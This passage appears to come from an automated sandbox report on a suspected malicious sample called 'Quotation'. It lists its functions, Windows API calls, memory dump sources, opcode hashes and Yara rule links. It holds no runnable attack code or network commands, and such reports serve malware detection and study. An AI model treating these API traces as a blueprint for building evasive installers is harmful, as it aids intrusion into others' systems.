                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                              • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                              • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                              • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                              Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                              • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                              • Opcode Fuzzy Hash: fc542d2aeae255aace097053f4ba420e9c5acb48d723f4d7d8b8c9f25ecb6f78
                                                              • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                              Function 004063BC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 004063E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction ID: 82e02668318ada1346e4ec156b308e726a090f155bb9469a8f3968b5644ca969
                                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                              • Instruction Fuzzy Hash: 86E0B6B2010109BFEF195F90ED5ADBB761DEB08250F01492EF916E4091E6B5E930A674
                                                              Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                              • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                              Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                              • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                              Function 73422A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(7342505C,00000004,00000040,7342504C), ref: 73422A9D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: e860d709cf0a501fa2f9338810a5de206db776d1a0c6215011c9821780532a20
                                                              • Instruction ID: 753dbcaa23ae11ad3a4eca4b4174f3f8af6c8760f91597a088764239f0d683bd
                                                              • Opcode Fuzzy Hash: e860d709cf0a501fa2f9338810a5de206db776d1a0c6215011c9821780532a20
                                                              • Instruction Fuzzy Hash: 36F0A5F2500280DEC358EF2A8C44B09BFE0B76A395B2545AAE19CF6243E3344044CFA9
                                                              Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                              • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                              • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                              • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                              Function 0040638E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                              • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                              Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
                                                              • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                              • Opcode Fuzzy Hash: 7514f4b4cf07e5dbc6536a57cc6181d37764b9883b465a465be066d1c05694d9
                                                              • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                              Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                              • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                              • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                              • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                              Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                              • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                              • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                              • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                              Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                              Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                              • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                              • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                              • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                              • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                                                              • Opcode Fuzzy Hash: 57e845af47943e6f27bbb4059720a752bc9b9a50a98f721ee69ade980d1e6af7
                                                              • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                                                              Function 734212BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,734212DB,?,7342137F,00000019,734211CA,-000000A0), ref: 734212C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: a6fe6385f725ccf70f09e7bcd71ccddde0cc44320f77ce8e82191fcfeabd6ce4
                                                              • Instruction ID: 46647c8aa29ad1483f3bf2024eba745d901509e4d7702d92665c01dfaa7ba020
                                                              • Opcode Fuzzy Hash: a6fe6385f725ccf70f09e7bcd71ccddde0cc44320f77ce8e82191fcfeabd6ce4
                                                              • Instruction Fuzzy Hash: B5B012B26000009FEE04AB15DC0AF3432D4F710304F240040B608F1142C12048008924

                                                              Non-executed Functions

                                                              Function 00404991 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                              • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
